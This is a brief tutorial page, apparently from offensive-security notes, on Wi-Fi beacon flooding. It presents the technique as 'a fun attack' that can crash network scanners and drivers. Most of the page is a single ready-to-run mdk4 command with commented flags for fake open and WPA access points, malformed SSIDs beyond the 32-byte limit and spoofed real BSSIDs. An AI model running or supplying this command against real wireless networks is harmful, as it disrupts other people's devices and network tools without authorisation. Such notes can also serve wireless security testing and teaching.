Beacon Flooding

Intro

This is a fun attack, but you can crash network scanners and even drivers! In this attack the attacker creates a lot of fake access points.

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS. This is to use BSSIDS that really exists
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

Last updated